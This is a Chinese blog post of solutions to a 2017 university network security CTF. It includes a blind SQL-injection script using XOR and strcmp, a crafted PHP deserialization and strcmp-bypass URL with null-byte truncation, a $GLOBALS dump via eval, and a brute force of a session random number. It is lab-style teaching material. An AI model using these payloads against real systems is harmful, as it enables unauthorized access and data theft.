2017年高校网络信息安全管理运维挑战赛部分题解
2017-11-03 09:03
447 查看
Login
右键源代码提示 用户名是admin 密码是pwd字段 典型注入试一下 发现全都过滤了,空格union select还有各种函数…
使用异或^构造payload:
(在我自己搭的环境里测试)发现可以
写脚本:
import requests url = 'http://202.112.26.124:8080/fb69d7b4467e33c71b0153e62f7e2bf0/index.php' s = requests.Session() pwd="" for i in range(1, 31): for j in range(65,122): payload = "admin'^(strcmp(left(right(pwd,"+str(i)+"),1),'"+chr(j)+"'))='1" #print payload data = {'uname':payload, 'pwd':'123'} r = s.post(url,data) #print r.content if 'password' in r.content: pwd += chr(j) print payload print pwd print pwd[::-1]
随机数:
http://202.112.26.124:8080/280a31eec4c62a893ad40a6508d207c8/index.php.bak备份文件泄露
审计源代码
只需要两个code相等即可
而SESSION[‘code’]的值在后文
发现就是一个随机数,打开burp抓包直接开跑
暴力跑code=?
快速计算
直接上脚本:import re, requests s = requests.Session() url = 'http://202.120.7.220:2333/' r = s.get(url) c = r.content num = re.findall(re.compile(r'br/>(.*?)=<input'), c)[0] print num data = {'v' : eval(num)} print data r = s.post(url, data = data) print r.content
不是管理员也能登陆:
根据提示 打开帮助与说明右键源代码:
思路很清晰了:用户名是0e开头的md5,密码是构造反序列化
搭环境试了一下
用户名:QNKCDZO
密码:a:2:{s:4:”name”;s:2:”XX”;s:3:”pwd”;s:2:”XX”;}
提交错误。。。这就很尴尬。所以感觉源码的XX并不是真正的XX
而且注意到是用的两个等于号 弱类型匹配,这就简单了,传0就行了
构造的密码为a:2:{s:4:”name”;i:0;s:3:”pwd”;i:0;}
过了
Easy crypto
审了一下题,需要将算法逆置。代码如下:
# -*- coding: utf-8 -*- def rc4(data,key): j=0 s=range(256) for i in range(256): j=(j+s[i]+ord(key[i%len(key)]))%256 s[i],s[j]=s[j],s[i] i=0 j=0 out=[] for char in data: i=(i+1)%256 j=(j+s[i])%256 s[i],s[j]=s[j],s[i] out.append(chr(ord(char)^s[(s[i]+s[j])%256])) return ''.join(out) f = open('enc.txt', 'r') r = f.read() encodedata=rc4(r,'hello world') print encodedata
PHP是最好的语言
2017年11月2日19:37
初步观察
打开之后一片空白,但是在index.php后面添加.bak可以下载到源码,可以看出这个题目属于php代码审计类型
2. 查看源码,确定方案
看到源码中含有反序列化函数,应该是考察PHP的反序列化漏洞
通读一遍代码发现,只要满足v1,v2,v3都为1就可以显示flag
源码中有三个函数可以让v1,v2,v3为1,因此主要目标就是满足这三个函数的条件让这三个函数执行
3. 具体操作
a. V1函数
第一个if需要a是一个数组,所以a=array();Isnumeric判断a的param1是否为数字,是数字直接退出,不是数字的话不进行任何操作,我们需要a[param1]不是数字,下一个if中,a[param1]需要大于2017,v1才会被设置为1,看似这个条件与上一个a[param1]不是数字矛盾,但是php一个数字和一个字符串进行比较或者进行运算时,PHP会把字符串转换成数字再进行比较。PHP转换的规则的是:若字符串以数字开头,则取开头数字作为转换结果,若无则输出0。那么可以写一句a[“param1”]=”2018a”;,那么2018>2017可以使条件成立
b. V2函数
首先需要a[param2]是一个数组,那么应该想到数组嵌套数组,
看下一个if条件,得知,如果a[param2]长度不为5或者a[param2][0]为0那么就会退出,所以我们需要构造的条件就是:a[param2]长度为5,而且a[param2][0]不为0。
继续往下看,pos变量我们需要它返回为True,需要的条件为使用array_search函数时,a[param2]中与nudt有匹配的值,然而往下看在遍历a[param2]中的值的时候,需要全部与“nudt”不相等,看似矛盾,但是由于“nudt”字符串与数字进行比较时,php会将nudt变成0,所以需要a[param2]中有个0
综上,构造一句:a[“param2”]=array(array(1),1,2,3,0);综上对a的构造已经完毕,可以序列化输出a的值,然后写入url里,print(serialize(a))
c. V3函数
第一个if需要c[1]为真,第二个if需要c[1]和d进行strcmp比较为0,而c[1]不等于d,
由于低版本php的strcmp有个漏洞:非字符串进行比较时,将会直接返回0,所以可以考虑将c[1]构造成数组,即egg[]为二维数组
因此可以构造egg[1][]=11&d=1
eregi函数匹配d和c[0]拼接起来的字符串中是否有M或n或s,我们需要它返回假,
而下一个函数查找MyAns在c[0]和d组成的字符串中出现的位置,所以需要MyAns不仅存在,而且不能在第0位,综上考虑,采用00截断方式,
egg[0]=%00MyAns
这样当d和c[0]拼接的字符串进行匹配时,不会读取到%00之后的内容,
而c[0]和d拼接起来的字符串进行匹配时,则从能读取到。
从而可以让v3=1
最后结果
构造的的url:
http://202.112.26.124:8080/95fe19724cc6084f08366340c848b791/index.php/?foo=a:2:{s:6:”param1”;s:5:”2018a”;s:6:”param2”;a:5:{i:0;a:1:{i:0;i:1;}i:1;i:1;i:2;i:2;i:3;i:3;i:4;i:0;}}&egg[0]=%00MyAns&egg[1][]=11&d=1
EIS{php_th3_b45t_l4ngu4g3}
文件上传
发现此题需要上传可执行php文件,但过滤掉了“<, ?”等一些特殊字符,需绕过,抓包传递数组php代码审计
<?php error_reporting(0); include "flag1.php"; highlight_file(__file__); if(isset($_GET['args'])){ $args = $_GET['args']; if(!preg_match("/^\w+$/",$args)){ die("args error!"); } eval("var_dump($$args);"); }
其中preg_match正则表达式的 意思是,匹配字符串,\w表示字符+数字+下划线,*代表有若干个\w字符组成。如果不匹配会输出 ‘’args error!‘’\
而下一句的$$args,比较有意思。解析一下,PHP中变量可以当作另一个变量的变量名。
$GLOBALS:一个包含了全部变量的全局组合数组。
构造payload:?args=BLOBLAS
即可爆出所有变量,其中包含flag
array(7) { [“GLOBALS”]=> RECURSION [“_POST”]=> array(0) { } [“_GET”]=> array(1) { [“args”]=> string(7) “GLOBALS” } [“_COOKIE”]=> array(0) { } [“_FILES”]=> array(0) { } [“ZFkwe3”]=> string(38) “flag{92853051ab894a64f7865cf3c2128b34}” [“args”]=> string(7) “GLOBALS” }
隐藏在黑夜里的秘密
放到010编辑器里面,看出是伪加密 提取出两个文件解压出来
flag.txt
bmp文件
图片分层后找到flag
php trick
右键查看源代码很明显的变量覆盖漏洞
RVF{woshiflag}
提示里有被加密了,凯撒算法
Flag格式是eis
很容易知道移13位
eis{jbfuvsynt}
相关文章推荐
- Python爬虫——2017高校网络信息安全管理运维挑战赛:随机数
- Python爬虫——2017高校网络信息安全管理运维挑战赛:快速计算
- 游戏安全资讯精选 2018年第一期:融资与乱象,2017的游戏之年;中宣部等8部委联合印发意见,要求严格规范网络游戏市场管理,阿里云安全2017年盘点
- 政府安全资讯精选 2017年第二十期 工信部发布《工业控制系统信息安全行动计划》;平昌冬奥会或成为黑客攻击目标 部分组织已遭钓鱼;多部门联合开展公共信息资源开放试点工作
- 网络安全靠法制,网络信息内容管理又增两细则
- 运用虚拟化架构实现银行运维网络安全的管理
- 第二届360杯全国大学生信息安全技术大赛部分解题思路(网络与协议)
- OSSIM(开源安全信息管理系统)在企业网络管理中的应用
- 如何保障IT信息运维管理安全
- 2017年全国职业技能大赛“网络信息安全与评估”
- 金融安全资讯精选 2017年第十八期:4个月内P2P网贷企业信息安全未合规将被取缔,全球100起重大投融资看未来网络安全发展热点,Gartner2017年安全投入以及人员投入占比相关数据
- OSSIM(开源安全信息管理系统)在企业网络管理中的应用
- 企业网络信息安全管理规划方案免费下载
- OSSIM(开源安全信息管理系统)在企业网络管理中的应用
- OSSIM(开源安全信息管理系统)在企业网络管理中的应用
- 第二届360杯全国大学生信息安全技术大赛部分解题思路(网络与协议)
- 信息安全管理(3):网络安全
- 政府安全资讯精选 2017年第十七期 全国各地开展打击整治网络侵犯公民个人信息犯罪专项行动;中共中央办公厅、国务院办公厅印发计划 IPv6规模部署提上日程
- 企业信息与网络通信安全(4)公司的管理和产权
- 网络***猖獗 信息安全管理要慎重